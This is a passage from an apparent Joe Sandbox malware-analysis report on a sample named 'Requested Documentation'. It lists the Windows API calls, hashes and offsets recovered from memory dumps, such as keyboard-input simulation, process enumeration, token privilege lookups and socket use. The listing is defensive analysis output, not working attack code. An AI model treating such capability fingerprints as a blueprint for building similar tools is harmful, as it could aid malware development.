                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: FromProg$FreeTask_memcmp
                                                                              • String ID:
                                                                              • API String ID: 314563124-0
                                                                              • Opcode ID: 1f8fc486b669bf13ebb262982feb73b3925a26668d4a06cfdd1aab9617616a5e
                                                                              • Instruction ID: f039808182db8d0e788ccf724070f96f7e738d057243ad35df1f7184de96ebea
                                                                              • Opcode Fuzzy Hash: 1f8fc486b669bf13ebb262982feb73b3925a26668d4a06cfdd1aab9617616a5e
                                                                              • Instruction Fuzzy Hash: 56812A75A00109EFCB00DFE4C984EEEB7B9FF89315F208559E505AB250EB71AE06CB61
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$AllocClearCopyInitString
                                                                              • String ID:
                                                                              • API String ID: 2808897238-0
                                                                              • Opcode ID: 1eff19255f1f6088e668a4a4053f40784d43c88b8e5afedd23648fc6d146b01b
                                                                              • Instruction ID: cf989053f8722e6e0d4627d27e262aca065d2a49c351b0083d0c3e9b74ab7298
                                                                              • Opcode Fuzzy Hash: 1eff19255f1f6088e668a4a4053f40784d43c88b8e5afedd23648fc6d146b01b
                                                                              • Instruction Fuzzy Hash: 6851A0747843029EDB24EF65D895B3AB3E9AF85310F20D81FE5D6EB392DA74D8808701
                                                                              APIs
                                                                              • GetWindowRect.USER32(0135ECD8,?), ref: 00A09863
                                                                              • ScreenToClient.USER32(00000002,00000002), ref: 00A09896
                                                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00A09903
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ClientMoveRectScreen
                                                                              • String ID:
                                                                              • API String ID: 3880355969-0
                                                                              • Opcode ID: 105be48858937f1eee6fb4ddfeedcda5ff4630535bbe5526fa8c9926d29af060
                                                                              • Instruction ID: e2bb090f050d032124ff5c34087fbadb53dd8a4c2174dc1526ddf9d58cb7dcd1
                                                                              • Opcode Fuzzy Hash: 105be48858937f1eee6fb4ddfeedcda5ff4630535bbe5526fa8c9926d29af060
                                                                              • Instruction Fuzzy Hash: 86514E34A00209EFDF14DF64D980AAE7BB5FF55360F148169F865AB3A1D731AD42CB90
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 009D9AD2
                                                                              • __itow.LIBCMT ref: 009D9B03
                                                                                • Part of subcall function 009D9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 009D9DBE
                                                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 009D9B6C
                                                                              • __itow.LIBCMT ref: 009D9BC3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$__itow
                                                                              • String ID:
                                                                              • API String ID: 3379773720-0
                                                                              • Opcode ID: 941b0db6d832c103fd8b95276fecb52066ce6039686d4bd0611ab84559c98cf7
                                                                              • Instruction ID: b80bb8323cf10cbe071586b09fd1f622641bed299eecfe3e6afa3460b4bf24ad
                                                                              • Opcode Fuzzy Hash: 941b0db6d832c103fd8b95276fecb52066ce6039686d4bd0611ab84559c98cf7
                                                                              • Instruction Fuzzy Hash: 69416E74A40208ABDF21FF54D845BEEBBB9EF85714F00406AF905A7391DB749A44CBA1
                                                                              APIs
                                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 009F69D1
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 009F69E1
                                                                                • Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
                                                                                • Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC
                                                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 009F6A45
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 009F6A51
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$__itow__swprintfsocket
                                                                              • String ID:
                                                                              • API String ID: 2214342067-0
                                                                              • Opcode ID: 695b03f7075583fd5c5658977a77cfc93b094207d6b3b9486539af3a0333624a
                                                                              • Instruction ID: 700c044595bec6f8f4ad3df7492c35421c192770fdb59f3621290a9f844fd144
                                                                              • Opcode Fuzzy Hash: 695b03f7075583fd5c5658977a77cfc93b094207d6b3b9486539af3a0333624a
                                                                              • Instruction Fuzzy Hash: F5418E75740204AFEB60BF64CC86F7A77A89B84B14F48C41CFA59AF3D2DA719D018B91
                                                                              APIs
                                                                              • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00A0F910), ref: 009F64A7
                                                                              • _strlen.LIBCMT ref: 009F64D9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _strlen
                                                                              • String ID:
                                                                              • API String ID: 4218353326-0
                                                                              • Opcode ID: 42f3b83da6cf22a57422f665c8aa00363c24e0ec957bf01983bbb19b27e75004
                                                                              • Instruction ID: b0f3639bf8c7d1b23e40081a0770c6aa91e8f49c084e890f8516ea88cdef863c
                                                                              • Opcode Fuzzy Hash: 42f3b83da6cf22a57422f665c8aa00363c24e0ec957bf01983bbb19b27e75004
                                                                              • Instruction Fuzzy Hash: 42419531600208AFCB14FBA8DC95FBEB7A9AF84314F148559F919AB392DB30AD05CB50
                                                                              APIs
                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 009EB89E
                                                                              • GetLastError.KERNEL32(?,00000000), ref: 009EB8C4
                                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 009EB8E9
                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 009EB915
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                              • String ID:
                                                                              • API String ID: 3321077145-0
                                                                              • Opcode ID: a930319cc891fb5912da5da68a5ea4789db2f41bbbcc10095b009405aa40ac06
                                                                              • Instruction ID: 8207bd27a5346a2786cfe6ba09f990473aa8e05437e2c2da9d7118334914c08c
                                                                              • Opcode Fuzzy Hash: a930319cc891fb5912da5da68a5ea4789db2f41bbbcc10095b009405aa40ac06
                                                                              • Instruction Fuzzy Hash: 64413D35600555DFCB11EF15C484A6EBBE5EF89314F098098ED4AAB762CB30FD02DB91
                                                                              APIs
                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A088DE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: InvalidateRect
                                                                              • String ID:
                                                                              • API String ID: 634782764-0
                                                                              • Opcode ID: 21c05e00ec4e4e3c84139378715bcbbeff3aa2d8b8b41417212eeb1d60cb1241
                                                                              • Instruction ID: bec621cd5c5750f19fb493b4731341e28e3f6bdc850fbfe6421c4f0991eca09b
                                                                              • Opcode Fuzzy Hash: 21c05e00ec4e4e3c84139378715bcbbeff3aa2d8b8b41417212eeb1d60cb1241
                                                                              • Instruction Fuzzy Hash: 0231C634A0010CEFEF20AB68EC85BBC77B5EB05390F544112F991E72E1CE79E9459B5A
                                                                              APIs
                                                                              • ClientToScreen.USER32(?,?), ref: 00A0AB60
                                                                              • GetWindowRect.USER32(?,?), ref: 00A0ABD6
                                                                              • PtInRect.USER32(?,?,00A0C014), ref: 00A0ABE6
                                                                              • MessageBeep.USER32(00000000), ref: 00A0AC57
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                              • String ID:
                                                                              • API String ID: 1352109105-0
                                                                              • Opcode ID: b45522b16abd218f88b1ab8c47cb183ee8f6dc6e674ea5d9d969fd8152848cee
                                                                              • Instruction ID: 9303538539d94f1bd35922fc8422ea21e8cb94b1065d29177e3117a174486028
                                                                              • Opcode Fuzzy Hash: b45522b16abd218f88b1ab8c47cb183ee8f6dc6e674ea5d9d969fd8152848cee
                                                                              • Instruction Fuzzy Hash: 8841B134A0021CDFDB21DF98E884B997BF5FF59300F1580A9E815DB2A1D731E842DB92
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 009E0B27
                                                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 009E0B43
                                                                              • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 009E0BA9
                                                                              • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 009E0BFB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                              • String ID:
                                                                              • API String ID: 432972143-0
                                                                              • Opcode ID: 2ce66e47a1cabcc4a7cf43f4d3dd44285606c8f3d034d8ad6165ab8a0b283e54
                                                                              • Instruction ID: 12f2ab28a37c0fe0035a0b0236b03c3a76072358505ebcefff4840473562fd29
                                                                              • Opcode Fuzzy Hash: 2ce66e47a1cabcc4a7cf43f4d3dd44285606c8f3d034d8ad6165ab8a0b283e54
                                                                              • Instruction Fuzzy Hash: 26315730940288AEFF328B668C05BFEBBADBBC4314F0C426AE481521D1C3F88DD19751
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 009E0C66
                                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 009E0C82
                                                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 009E0CE1
                                                                              • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 009E0D33
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                              • String ID:
                                                                              • API String ID: 432972143-0
                                                                              • Opcode ID: aabbc49f3a0f54d6ae15489d7604e3cea15cbdbe9428b0d8433a1f1a39507d38
                                                                              • Instruction ID: b9b7682bb2e050fba99cb4ac075ae9c3876bb390141f066bd025fc3e992fafc5
                                                                              • Opcode Fuzzy Hash: aabbc49f3a0f54d6ae15489d7604e3cea15cbdbe9428b0d8433a1f1a39507d38
                                                                              • Instruction Fuzzy Hash: 32313730940388AEFF328B668C157BEBB6AABC5310F14871AE4C1621D1C3B99DD68752
                                                                              APIs
                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009B61FB
                                                                              • __isleadbyte_l.LIBCMT ref: 009B6229
                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 009B6257
                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 009B628D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                              • String ID:
                                                                              • API String ID: 3058430110-0
                                                                              • Opcode ID: 817e036653858e5e6398a7523efa318ba7be104fe84ea88ae2ed001239a144b9
                                                                              • Instruction ID: 5cbc966da7ff9006b02e44201cc8a2c2e1fd8f1a18aa01129df547620896437d
                                                                              • Opcode Fuzzy Hash: 817e036653858e5e6398a7523efa318ba7be104fe84ea88ae2ed001239a144b9
                                                                              • Instruction Fuzzy Hash: F931C131604246AFEF218F68CD48BFA7BA9FF42320F154528E864D7191E734E951DB90
                                                                              APIs
                                                                              • GetForegroundWindow.USER32 ref: 00A04F02
                                                                                • Part of subcall function 009E3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 009E365B
                                                                                • Part of subcall function 009E3641: GetCurrentThreadId.KERNEL32 ref: 009E3662
                                                                                • Part of subcall function 009E3641: AttachThreadInput.USER32(00000000,?,009E5005), ref: 009E3669
                                                                              • GetCaretPos.USER32(?), ref: 00A04F13
                                                                              • ClientToScreen.USER32(00000000,?), ref: 00A04F4E
                                                                              • GetForegroundWindow.USER32 ref: 00A04F54
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                              • String ID:
                                                                              • API String ID: 2759813231-0
                                                                              • Opcode ID: bce828c436e59f14b1b7a0bec6e28bce8f2ddb024baac03bdcc66978d64548f0
                                                                              • Instruction ID: c09738185bf16f6f1f29bc73d6fc66f6ef426ac3c70e64089805c74182a373c1
                                                                              • Opcode Fuzzy Hash: bce828c436e59f14b1b7a0bec6e28bce8f2ddb024baac03bdcc66978d64548f0
                                                                              • Instruction Fuzzy Hash: E9313CB1D00108AFCB10EFB5C885AEFB7F9EF88304F10406AE815E7241DA71AE45CBA0
                                                                              APIs
                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 009E3C7A
                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 009E3C88
                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 009E3CA8
                                                                              • CloseHandle.KERNEL32(00000000), ref: 009E3D52
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                              • String ID:
                                                                              • API String ID: 420147892-0
                                                                              • Opcode ID: 5a0183bf96232f8ac2b9aacfef8011134005c76a91dbd73bf37b816579b81bfb
                                                                              • Instruction ID: ed013e6007f0c3db720e89ce0936ad5535b9d0343fab9977a7e4f7e3faac0fd0
                                                                              • Opcode Fuzzy Hash: 5a0183bf96232f8ac2b9aacfef8011134005c76a91dbd73bf37b816579b81bfb
                                                                              • Instruction Fuzzy Hash: C2319C711083459FC311EF51C885BABBBE8AFD9310F50092CF582862A1EB71DE4ACB92
                                                                              APIs
                                                                                • Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623
                                                                              • GetCursorPos.USER32(?), ref: 00A0C4D2
                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,009BB9AB,?,?,?,?,?), ref: 00A0C4E7
                                                                              • GetCursorPos.USER32(?), ref: 00A0C534
                                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,009BB9AB,?,?,?), ref: 00A0C56E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                              • String ID:
                                                                              • API String ID: 2864067406-0
                                                                              • Opcode ID: 9499f2318ed0e3a7bbd6a4dfe3de808d5fd94351530ff222d24dc9784c311f3a
                                                                              • Instruction ID: 4281d56c1d077f6b98ce69d887f9a201923b1d0d411df474a6e796463d023c29
                                                                              • Opcode Fuzzy Hash: 9499f2318ed0e3a7bbd6a4dfe3de808d5fd94351530ff222d24dc9784c311f3a
                                                                              • Instruction Fuzzy Hash: 7B31853990005CAFCB25CF98DC68EEA7BB5EB49320F444165F9059B2A1C732BD51DBA4
                                                                              APIs
                                                                                • Part of subcall function 009D810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 009D8121
                                                                                • Part of subcall function 009D810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 009D812B
                                                                                • Part of subcall function 009D810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009D813A
                                                                                • Part of subcall function 009D810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 009D8141
                                                                                • Part of subcall function 009D810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009D8157
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 009D86A3
                                                                              • _memcmp.LIBCMT ref: 009D86C6
                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009D86FC
                                                                              • HeapFree.KERNEL32(00000000), ref: 009D8703
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                              • String ID:
                                                                              • API String ID: 1592001646-0
                                                                              • Opcode ID: 35d2042468d3a4c34917c7ab5f066901c52b5af2492e07433d57d4f286e3e104
                                                                              • Instruction ID: 054cc4d9b4de81218f063a449f3021b1ae418c2295f7c3e0af358dad200815b6
                                                                              • Opcode Fuzzy Hash: 35d2042468d3a4c34917c7ab5f066901c52b5af2492e07433d57d4f286e3e104
                                                                              • Instruction Fuzzy Hash: CF217C71E84209EFDB10DFA4C949BEEB7B8EF44314F55805AE444A7242EB30AE05CB90
                                                                              APIs
                                                                              • __setmode.LIBCMT ref: 009A09AE
                                                                                • Part of subcall function 00985A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,009E7896,?,?,00000000), ref: 00985A2C
                                                                                • Part of subcall function 00985A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,009E7896,?,?,00000000,?,?), ref: 00985A50
                                                                              • _fprintf.LIBCMT ref: 009A09E5
                                                                              • OutputDebugStringW.KERNEL32(?), ref: 009D5DBB
                                                                                • Part of subcall function 009A4AAA: _flsall.LIBCMT ref: 009A4AC3
                                                                              • __setmode.LIBCMT ref: 009A0A1A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                              • String ID:
                                                                              APIs
